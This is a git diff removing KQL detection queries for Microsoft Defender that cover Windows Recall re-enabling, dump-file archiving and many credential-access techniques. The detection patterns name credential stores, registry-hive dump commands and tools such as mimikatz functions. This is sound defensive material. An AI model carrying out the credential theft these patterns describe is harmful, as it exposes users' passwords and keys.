diff --git a/Collection/Windows_Recall_Feature_Enabled_-_DisableAIDataAnalysis_Value_Deleted.kql b/Collection/Windows_Recall_Feature_Enabled_-_DisableAIDataAnalysis_Value_Deleted.kql deleted file mode 100644 index c4ab53b9..00000000 --- a/Collection/Windows_Recall_Feature_Enabled_-_DisableAIDataAnalysis_Value_Deleted.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: Sajid Nawaz Khan -// Date: 2024/06/02 -// Level: medium -// Description: Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" registry value. -Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. -This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary. - -// Tags: attack.collection, attack.t1113 -DeviceRegistryEvents -| where ActionType =~ "DeleteValue" and RegistryKey endswith "\\Microsoft\\Windows\\WindowsAI\\DisableAIDataAnalysis" \ No newline at end of file diff --git a/Collection/Windows_Recall_Feature_Enabled_-_Registry.kql b/Collection/Windows_Recall_Feature_Enabled_-_Registry.kql deleted file mode 100644 index 198194ac..00000000 --- a/Collection/Windows_Recall_Feature_Enabled_-_Registry.kql +++ /dev/null 
@@ -1,10 +0,0 @@
-// Author: Sajid Nawaz Khan
-// Date: 2024/06/02
-// Level: medium
-// Description: Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by setting the value of "DisableAIDataAnalysis" to "0".
-Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.
-This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.
-
-// Tags: attack.collection, attack.t1113
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "\\Software\\Policies\\Microsoft\\Windows\\WindowsAI\\DisableAIDataAnalysis"
\ No newline at end of file
diff --git a/Collection/Windows_Recall_Feature_Enabled_Via_Reg.EXE.kql b/Collection/Windows_Recall_Feature_Enabled_Via_Reg.EXE.kql
deleted file mode 100644
index 455bb30d..00000000
--- a/Collection/Windows_Recall_Feature_Enabled_Via_Reg.EXE.kql
+++ /dev/null
@@ -1,11 +0,0 @@
-// Author: Sajid Nawaz Khan
-// Date: 2024/06/02
-// Level: medium
-// Description: Detects the enabling of the Windows Recall feature via registry manipulation.
-Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" value, or setting it to 0.
-Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.
-This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.
-
-// Tags: attack.collection, attack.t1113
-DeviceProcessEvents
-| where (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and (ProcessCommandLine contains "Microsoft\\Windows\\WindowsAI" and ProcessCommandLine contains "DisableAIDataAnalysis") and ((ProcessCommandLine contains "add" or ProcessCommandLine contains "0") or ProcessCommandLine contains "delete")
\ No newline at end of file
diff --git a/Collection/Winrar_Compressing_Dump_Files.kql b/Collection/Winrar_Compressing_Dump_Files.kql
deleted file mode 100644
index 6970f434..00000000
--- a/Collection/Winrar_Compressing_Dump_Files.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/01/04
-// Level: medium
-// Description: Detects execution of WinRAR in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration.
-// Tags: attack.collection, attack.t1560.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains ".dmp" or ProcessCommandLine contains ".dump" or ProcessCommandLine contains ".hdmp") and ((FolderPath endswith "\\rar.exe" or FolderPath endswith "\\winrar.exe") or ProcessVersionInfoFileDescription =~ "Command line RAR")
\ No newline at end of file
diff --git a/Collection/Winrar_Execution_in_Non-Standard_Folder.kql b/Collection/Winrar_Execution_in_Non-Standard_Folder.kql
deleted file mode 100644
index f6a68209..00000000
--- a/Collection/Winrar_Execution_in_Non-Standard_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Tigzy
-// Date: 2021/11/17
-// Level: medium
-// Description: Detects a suspicious winrar execution in a folder which is not the default installation folder
-// Tags: attack.collection, attack.t1560.001
-DeviceProcessEvents
-| where ((FolderPath endswith "\\rar.exe" or FolderPath endswith "\\winrar.exe") or ProcessVersionInfoFileDescription =~ "Command line RAR") and (not(((FolderPath contains ":\\Program Files (x86)\\WinRAR\\" or FolderPath contains ":\\Program Files\\WinRAR\\") or FolderPath endswith "\\UnRAR.exe"))) and (not(FolderPath contains ":\\Windows\\Temp\\"))
\ No newline at end of file
diff --git a/Credential Access/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql b/Credential Access/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql
deleted file mode 100644
index 5a91ee73..00000000
--- a/Credential Access/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/23
-// Level: high
-// Description: Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.
-// Tags: attack.execution, attack.reconnaissance, attack.discovery, attack.credential_access, attack.impact
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Add-AADInt" or ProcessCommandLine contains "ConvertTo-AADInt" or ProcessCommandLine contains "Disable-AADInt" or ProcessCommandLine contains "Enable-AADInt" or ProcessCommandLine contains "Export-AADInt" or ProcessCommandLine contains "Get-AADInt" or ProcessCommandLine contains "Grant-AADInt" or ProcessCommandLine contains "Install-AADInt" or ProcessCommandLine contains "Invoke-AADInt" or ProcessCommandLine contains "Join-AADInt" or ProcessCommandLine contains "New-AADInt" or ProcessCommandLine contains "Open-AADInt" or ProcessCommandLine contains "Read-AADInt" or ProcessCommandLine contains "Register-AADInt" or ProcessCommandLine contains "Remove-AADInt" or ProcessCommandLine contains "Restore-AADInt" or ProcessCommandLine contains "Search-AADInt" or ProcessCommandLine contains "Send-AADInt" or ProcessCommandLine contains "Set-AADInt" or ProcessCommandLine contains "Start-AADInt" or ProcessCommandLine contains "Update-AADInt") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.Exe", "pwsh.dll")))
\ No newline at end of file
diff --git a/Credential Access/Access_To_Browser_Credential_Files_By_Uncommon_Application.kql b/Credential Access/Access_To_Browser_Credential_Files_By_Uncommon_Application.kql
deleted file mode 100644
index 7291b3f5..00000000
--- a/Credential Access/Access_To_Browser_Credential_Files_By_Uncommon_Application.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2022/04/09
-// Level: medium
-// Description: Detects file access requests to browser credential stores by uncommon processes.
-Could indicate potential attempt of credential stealing.
-Requires heavy baselining before usage
-
-// Tags: attack.t1003, attack.credential_access
-DeviceFileEvents
-| where ((FileName contains "\\Appdata\\Local\\Chrome\\User Data\\Default\\Login Data" or FileName contains "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network\\Cookies" or FileName contains "\\AppData\\Local\\Google\\Chrome\\User Data\\Local State") or (FileName endswith "\\cookies.sqlite" or FileName endswith "release\\key3.db" or FileName endswith "release\\key4.db" or FileName endswith "release\\logins.json") or FileName endswith "\\Appdata\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat") and (not(((InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\Windows\\system32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\") or InitiatingProcessFolderPath =~ "System"))) and (not(((InitiatingProcessFolderPath contains ":\\ProgramData\\Microsoft\\Windows Defender\\" and (InitiatingProcessFolderPath endswith "\\MpCopyAccelerator.exe" or InitiatingProcessFolderPath endswith "\\MsMpEng.exe")) or (InitiatingProcessFolderPath endswith "\\thor64.exe" or InitiatingProcessFolderPath endswith "\\thor.exe"))))
\ No newline at end of file
diff --git a/Credential Access/Access_To_Potentially_Sensitive_Sysvol_Files_By_Uncommon_Application.kql b/Credential Access/Access_To_Potentially_Sensitive_Sysvol_Files_By_Uncommon_Application.kql
deleted file mode 100644
index a9c88609..00000000
--- a/Credential Access/Access_To_Potentially_Sensitive_Sysvol_Files_By_Uncommon_Application.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2023/12/21
-// Level: medium
-// Description: Detects file access requests to potentially sensitive files hosted on the Windows Sysvol share.
-// Tags: attack.credential_access, attack.t1552.006
-DeviceFileEvents
-| where ((FileName contains "\\sysvol\\" and FileName contains "\\Policies\\") and (FileName endswith "audit.csv" or FileName endswith "Files.xml" or FileName endswith "GptTmpl.inf" or FileName endswith "groups.xml" or FileName endswith "Registry.pol" or FileName endswith "Registry.xml" or FileName endswith "scheduledtasks.xml" or FileName endswith "scripts.ini" or FileName endswith "services.xml") and FileName startswith "\\") and (not((InitiatingProcessFolderPath startswith ":\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith ":\\Program Files\\" or InitiatingProcessFolderPath startswith ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath startswith ":\\Windows\\system32\\" or InitiatingProcessFolderPath startswith ":\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/Credential Access/Access_To_Windows_Credential_History_File_By_Uncommon_Application.kql b/Credential Access/Access_To_Windows_Credential_History_File_By_Uncommon_Application.kql
deleted file mode 100644
index 89cda722..00000000
--- a/Credential Access/Access_To_Windows_Credential_History_File_By_Uncommon_Application.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/17
-// Level: medium
-// Description: Detects file access requests to the Windows Credential History File by an uncommon application.
-This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::credhist" function
-
-// Tags: attack.credential_access, attack.t1555.004
-DeviceFileEvents
-| where FileName endswith "\\Microsoft\\Protect\\CREDHIST" and (not((InitiatingProcessFolderPath endswith ":\\Windows\\explorer.exe" or (InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Windows\\system32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\"))))
\ No newline at end of file
diff --git a/Credential Access/Access_To_Windows_DPAPI_Master_Keys_By_Uncommon_Application.kql b/Credential Access/Access_To_Windows_DPAPI_Master_Keys_By_Uncommon_Application.kql
deleted file mode 100644
index 58097097..00000000
--- a/Credential Access/Access_To_Windows_DPAPI_Master_Keys_By_Uncommon_Application.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/17
-// Level: medium
-// Description: Detects file access requests to the the Windows Data Protection API Master keys by an uncommon application.
-This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::masterkey" function
-
-// Tags: attack.credential_access, attack.t1555.004
-DeviceFileEvents
-| where (FileName contains "\\Microsoft\\Protect\\S-1-5-18\\" or FileName contains "\\Microsoft\\Protect\\S-1-5-21-") and (not((InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Windows\\system32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/Credential Access/Active_Directory_Database_Snapshot_Via_ADExplorer.kql b/Credential Access/Active_Directory_Database_Snapshot_Via_ADExplorer.kql
deleted file mode 100644
index 35b910af..00000000
--- a/Credential Access/Active_Directory_Database_Snapshot_Via_ADExplorer.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/14
-// Level: medium
-// Description: Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database.
-// Tags: attack.credential_access, attack.t1552.001, attack.t1003.003
-DeviceProcessEvents
-| where ProcessCommandLine contains "snapshot" and (FolderPath endswith "\\ADExplorer.exe" or ProcessVersionInfoOriginalFileName =~ "AdExp")
\ No newline at end of file
diff --git a/Credential Access/Automated_Collection_Command_Prompt.kql b/Credential Access/Automated_Collection_Command_Prompt.kql
deleted file mode 100644
index 9f680167..00000000
--- a/Credential Access/Automated_Collection_Command_Prompt.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/07/28
-// Level: medium
-// Description: Once established within a system or network, an adversary may use automated techniques for collecting internal data.
-// Tags: attack.collection, attack.t1119, attack.credential_access, attack.t1552.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains ".doc" or ProcessCommandLine contains ".docx" or ProcessCommandLine contains ".xls" or ProcessCommandLine contains ".xlsx" or ProcessCommandLine contains ".ppt" or ProcessCommandLine contains ".pptx" or ProcessCommandLine contains ".rtf" or ProcessCommandLine contains ".pdf" or ProcessCommandLine contains ".txt") and ((ProcessCommandLine contains "dir " and ProcessCommandLine contains " /b " and ProcessCommandLine contains " /s ") or ((ProcessCommandLine contains " /e " or ProcessCommandLine contains " /si ") and ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE"))
\ No newline at end of file
diff --git a/Credential Access/Browser_Started_with_Remote_Debugging.kql b/Credential Access/Browser_Started_with_Remote_Debugging.kql
deleted file mode 100644
index a1e712fd..00000000
--- a/Credential Access/Browser_Started_with_Remote_Debugging.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/27
-// Level: medium
-// Description: Detects browsers starting with the remote debugging flags. Which is a technique often used to perform browser injection attacks
-// Tags: attack.credential_access, attack.t1185
-DeviceProcessEvents
-| where ProcessCommandLine contains " --remote-debugging-" or (ProcessCommandLine contains " -start-debugger-server" and FolderPath endswith "\\firefox.exe")
\ No newline at end of file
diff --git a/Credential Access/Capture_Credentials_with_Rpcping.exe.kql b/Credential Access/Capture_Credentials_with_Rpcping.exe.kql
deleted file mode 100644
index a795212c..00000000
--- a/Credential Access/Capture_Credentials_with_Rpcping.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Julia Fomina, oscd.community
-// Date: 2020/10/09
-// Level: medium
-// Description: Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.
-// Tags: attack.credential_access, attack.t1003
-DeviceProcessEvents
-| where FolderPath endswith "\\rpcping.exe" and (ProcessCommandLine contains "-s" or ProcessCommandLine contains "/s") and (((ProcessCommandLine contains "-u" or ProcessCommandLine contains "/u") and (ProcessCommandLine contains "NTLM")) or ((ProcessCommandLine contains "-t" or ProcessCommandLine contains "/t") and (ProcessCommandLine contains "ncacn_np")))
\ No newline at end of file
diff --git a/Credential Access/Certificate_Exported_Via_PowerShell.kql b/Credential Access/Certificate_Exported_Via_PowerShell.kql
deleted file mode 100644
index 3d1a911f..00000000
--- a/Credential Access/Certificate_Exported_Via_PowerShell.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/18
-// Level: medium
-// Description: Detects calls to cmdlets that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.
-// Tags: attack.credential_access, attack.execution, attack.t1552.004, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "Export-PfxCertificate " or ProcessCommandLine contains "Export-Certificate "
\ No newline at end of file
diff --git a/Credential Access/Copying_Sensitive_Files_with_Credential_Data.kql b/Credential Access/Copying_Sensitive_Files_with_Credential_Data.kql
deleted file mode 100644
index 7128b3f4..00000000
--- a/Credential Access/Copying_Sensitive_Files_with_Credential_Data.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community
-// Date: 2019/10/22
-// Level: high
-// Description: Files with well-known filenames (sensitive files with credential data) copying
-// Tags: attack.credential_access, attack.t1003.002, attack.t1003.003, car.2013-07-001, attack.s0404
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "vss" or ProcessCommandLine contains " /m " or ProcessCommandLine contains " /y ") and (FolderPath endswith "\\esentutl.exe" or ProcessVersionInfoOriginalFileName =~ "\\esentutl.exe")) or (ProcessCommandLine contains "\\windows\\ntds\\ntds.dit" or ProcessCommandLine contains "\\config\\sam" or ProcessCommandLine contains "\\config\\security" or ProcessCommandLine contains "\\config\\system " or ProcessCommandLine contains "\\repair\\sam" or ProcessCommandLine contains "\\repair\\system" or ProcessCommandLine contains "\\repair\\security" or ProcessCommandLine contains "\\config\\RegBack\\sam" or ProcessCommandLine contains "\\config\\RegBack\\system" or ProcessCommandLine contains "\\config\\RegBack\\security")
\ No newline at end of file
diff --git a/Credential Access/CrackMapExec_File_Indicators.kql b/Credential Access/CrackMapExec_File_Indicators.kql
deleted file mode 100644
index a26d915b..00000000
--- a/Credential Access/CrackMapExec_File_Indicators.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024/03/11
-// Level: high
-// Description: Detects file creation events with filename patterns used by CrackMapExec.
-// Tags: attack.credential_access, attack.t1003.001
-DeviceFileEvents
-| where FolderPath startswith "C:\\Windows\\Temp\\" and ((FolderPath matches regex "\\\\[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\\.txt$" or FolderPath matches regex "\\\\[a-zA-Z]{8}\\.tmp$") or (FolderPath endswith "\\temp.ps1" or FolderPath endswith "\\msol.ps1"))
\ No newline at end of file
diff --git a/Credential Access/CredUI.DLL_Loaded_By_Uncommon_Process.kql b/Credential Access/CredUI.DLL_Loaded_By_Uncommon_Process.kql
deleted file mode 100644
index 0fb4879a..00000000
--- a/Credential Access/CredUI.DLL_Loaded_By_Uncommon_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/10/20
-// Level: medium
-// Description: Detects loading of "credui.dll" and related DLLs by an uncommon process. Attackers might leverage this DLL for potential use of "CredUIPromptForCredentials" or "CredUnPackAuthenticationBufferW".
-// Tags: attack.credential_access, attack.collection, attack.t1056.002
-DeviceImageLoadEvents
-| where ((FolderPath endswith "\\credui.dll" or FolderPath endswith "\\wincredui.dll") or (InitiatingProcessVersionInfoOriginalFileName in~ ("credui.dll", "wincredui.dll"))) and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe", "C:\\Windows\\regedit.exe")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))) and (not(((InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\OneDrive\\" and InitiatingProcessFolderPath startswith "C:\\Users\\") or InitiatingProcessFolderPath endswith "\\opera_autoupdate.exe" or (InitiatingProcessFolderPath endswith "\\procexp64.exe" or InitiatingProcessFolderPath endswith "\\procexp.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\Teams\\" and InitiatingProcessFolderPath endswith "\\Teams.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\"))))
\ No newline at end of file
diff --git a/Credential Access/Cred_Dump_Tools_Dropped_Files.kql b/Credential Access/Cred_Dump_Tools_Dropped_Files.kql
deleted file mode 100644
index 7914875e..00000000
--- a/Credential Access/Cred_Dump_Tools_Dropped_Files.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov, oscd.community
-// Date: 2019/11/01
-// Level: high
-// Description: Files with well-known filenames (parts of credential dump software or files produced by them) creation
-// Tags: attack.credential_access, attack.t1003.001, attack.t1003.002, attack.t1003.003, attack.t1003.004, attack.t1003.005
-DeviceFileEvents
-| where (FolderPath contains "\\fgdump-log" or FolderPath contains "\\kirbi" or FolderPath contains "\\pwdump" or FolderPath contains "\\pwhashes" or FolderPath contains "\\wce_ccache" or FolderPath contains "\\wce_krbtkts") or (FolderPath endswith "\\cachedump.exe" or FolderPath endswith "\\cachedump64.exe" or FolderPath endswith "\\DumpExt.dll" or FolderPath endswith "\\DumpSvc.exe" or FolderPath endswith "\\Dumpy.exe" or FolderPath endswith "\\fgexec.exe" or FolderPath endswith "\\lsremora.dll" or FolderPath endswith "\\lsremora64.dll" or FolderPath endswith "\\NTDS.out" or FolderPath endswith "\\procdump64.exe" or FolderPath endswith "\\pstgdump.exe" or FolderPath endswith "\\pwdump.exe" or FolderPath endswith "\\SAM.out" or FolderPath endswith "\\SECURITY.out" or FolderPath endswith "\\servpw.exe" or FolderPath endswith "\\servpw64.exe" or FolderPath endswith "\\SYSTEM.out" or FolderPath endswith "\\test.pwd" or FolderPath endswith "\\wceaux.dll")
\ No newline at end of file
diff --git a/Credential Access/Credential_Manager_Access_By_Uncommon_Application.kql b/Credential Access/Credential_Manager_Access_By_Uncommon_Application.kql
deleted file mode 100644
index 3451a855..00000000
--- a/Credential Access/Credential_Manager_Access_By_Uncommon_Application.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/11
-// Level: medium
-// Description: Detects suspicious processes based on name and location that access the windows credential manager and vault.
-Which can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::cred" function
-
-// Tags: attack.t1003, attack.credential_access
-DeviceFileEvents
-| where (FileName contains "\\AppData\\Local\\Microsoft\\Credentials\\" or FileName contains "\\AppData\\Roaming\\Microsoft\\Credentials\\" or FileName contains "\\AppData\\Local\\Microsoft\\Vault\\" or FileName contains "\\ProgramData\\Microsoft\\Vault\\") and (not((InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Windows\\system32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/Credential Access/Dropping_Of_Password_Filter_DLL.kql b/Credential Access/Dropping_Of_Password_Filter_DLL.kql
deleted file mode 100644
index 2ced395a..00000000
--- a/Credential Access/Dropping_Of_Password_Filter_DLL.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Sreeman
-// Date: 2020/10/29
-// Level: medium
-// Description: Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS
-// Tags: attack.credential_access, attack.t1556.002
-DeviceProcessEvents
-| where ProcessCommandLine contains "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa" and ProcessCommandLine contains "scecli\\0" and ProcessCommandLine contains "reg add"
\ No newline at end of file
diff --git a/Credential Access/Dumping_Process_via_Sqldumper.exe.kql b/Credential Access/Dumping_Process_via_Sqldumper.exe.kql
deleted file mode 100644
index ec50686d..00000000
--- a/Credential Access/Dumping_Process_via_Sqldumper.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Kirill Kiryanov, oscd.community
-// Date: 2020/10/08
-// Level: medium
-// Description: Detects process dump via legitimate sqldumper.exe binary
-// Tags: attack.credential_access, attack.t1003.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "0x0110" or ProcessCommandLine contains "0x01100:40") and FolderPath endswith "\\sqldumper.exe"
\ No newline at end of file
diff --git a/Credential Access/Dumping_of_Sensitive_Hives_Via_Reg.EXE.kql b/Credential Access/Dumping_of_Sensitive_Hives_Via_Reg.EXE.kql
deleted file mode 100644
index 473cc6b9..00000000
--- a/Credential Access/Dumping_of_Sensitive_Hives_Via_Reg.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113
-// Date: 2019/10/22
-// Level: high
-// Description: Detects the usage of "reg.exe" in order to dump sensitive registry hives. This includes SAM, SYSTEM and SECURITY hives.
-// Tags: attack.credential_access, attack.t1003.002, attack.t1003.004, attack.t1003.005, car.2013-07-001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " save " or ProcessCommandLine contains " export " or ProcessCommandLine contains " ˢave " or ProcessCommandLine contains " eˣport ") and (ProcessCommandLine contains "\\system" or ProcessCommandLine contains "\\sam" or ProcessCommandLine contains "\\security" or ProcessCommandLine contains "\\ˢystem" or ProcessCommandLine contains "\\syˢtem" or ProcessCommandLine contains "\\ˢyˢtem" or ProcessCommandLine contains "\\ˢam" or ProcessCommandLine contains "\\ˢecurity") and (ProcessCommandLine contains "hklm" or ProcessCommandLine contains "hk˪m" or ProcessCommandLine contains "hkey_local_machine" or ProcessCommandLine contains "hkey_˪ocal_machine" or ProcessCommandLine contains "hkey_loca˪_machine" or ProcessCommandLine contains "hkey_˪oca˪_machine") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")
\ No newline at end of file
diff --git a/Credential Access/Enumeration_for_3rd_Party_Creds_From_CLI.kql b/Credential Access/Enumeration_for_3rd_Party_Creds_From_CLI.kql
deleted file mode 100644
index 8512a497..00000000
--- a/Credential Access/Enumeration_for_3rd_Party_Creds_From_CLI.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/20
-// Level: medium
-// Description: Detects processes that query known 3rd party registry keys that holds credentials via commandline
-// Tags: attack.credential_access, attack.t1552.002
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\Software\\SimonTatham\\PuTTY\\Sessions" or ProcessCommandLine contains "\\Software\\SimonTatham\\PuTTY\\SshHostKeys\\" or ProcessCommandLine contains "\\Software\\Mobatek\\MobaXterm\\" or ProcessCommandLine contains "\\Software\\WOW6432Node\\Radmin\\v3.0\\Server\\Parameters\\Radmin" or ProcessCommandLine contains "\\Software\\Aerofox\\FoxmailPreview" or ProcessCommandLine contains "\\Software\\Aerofox\\Foxmail\\V3.1" or ProcessCommandLine contains "\\Software\\IncrediMail\\Identities" or ProcessCommandLine contains "\\Software\\Qualcomm\\Eudora\\CommandLine" or ProcessCommandLine contains "\\Software\\RimArts\\B2\\Settings" or ProcessCommandLine contains "\\Software\\OpenVPN-GUI\\configs" or ProcessCommandLine contains "\\Software\\Martin Prikryl\\WinSCP 2\\Sessions" or ProcessCommandLine contains "\\Software\\FTPWare\\COREFTP\\Sites" or ProcessCommandLine contains "\\Software\\DownloadManager\\Passwords" or ProcessCommandLine contains "\\Software\\OpenSSH\\Agent\\Keys" or ProcessCommandLine contains "\\Software\\TightVNC\\Server" or ProcessCommandLine contains "\\Software\\ORL\\WinVNC3\\Password" or ProcessCommandLine contains "\\Software\\RealVNC\\WinVNC4"
\ No newline at end of file
diff --git a/Credential Access/Enumeration_for_Credentials_in_Registry.kql b/Credential Access/Enumeration_for_Credentials_in_Registry.kql
deleted file mode 100644
index 1ba1bafc..00000000
--- a/Credential Access/Enumeration_for_Credentials_in_Registry.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2021/12/20
-// Level: medium
-// Description: Adversaries may search the Registry on compromised systems for insecurely stored credentials.
-The Windows Registry stores configuration information that can be used by the system or other programs.
-Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services
-
-// Tags: attack.credential_access, attack.t1552.002
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " query " and ProcessCommandLine contains "/t " and ProcessCommandLine contains "REG_SZ" and ProcessCommandLine contains "/s") and FolderPath endswith "\\reg.exe") and ((ProcessCommandLine contains "/f " and ProcessCommandLine contains "HKLM") or (ProcessCommandLine contains "/f " and ProcessCommandLine contains "HKCU") or ProcessCommandLine contains "HKCU\\Software\\SimonTatham\\PuTTY\\Sessions")
\ No newline at end of file
diff --git a/Credential Access/Esentutl_Gather_Credentials.kql b/Credential Access/Esentutl_Gather_Credentials.kql
deleted file mode 100644
index 737a9cd8..00000000
--- a/Credential Access/Esentutl_Gather_Credentials.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: sam0x90
-// Date: 2021/08/06
-// Level: medium
-// Description: Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab.
-// Tags: attack.credential_access, attack.t1003, attack.t1003.003
-DeviceProcessEvents
-| where ProcessCommandLine contains "esentutl" and ProcessCommandLine contains " /p"
\ No newline at end of file
diff --git a/Credential Access/Esentutl_Volume_Shadow_Copy_Service_Keys.kql b/Credential Access/Esentutl_Volume_Shadow_Copy_Service_Keys.kql
deleted file mode 100644
index 7ff25f25..00000000
--- a/Credential Access/Esentutl_Volume_Shadow_Copy_Service_Keys.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/10/20
-// Level: high
-// Description: Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\System\\CurrentControlSet\\Services\\VSS\\Diag\\VolSnap\\Volume are captured.
-// Tags: attack.credential_access, attack.t1003.002
-DeviceRegistryEvents
-| where (InitiatingProcessFolderPath endswith "esentutl.exe" and RegistryKey contains "System\\CurrentControlSet\\Services\\VSS") and (not(RegistryKey contains "System\\CurrentControlSet\\Services\\VSS\\Start"))
\ No newline at end of file
diff --git a/Credential Access/Findstr_GPP_Passwords.kql b/Credential Access/Findstr_GPP_Passwords.kql
deleted file mode 100644
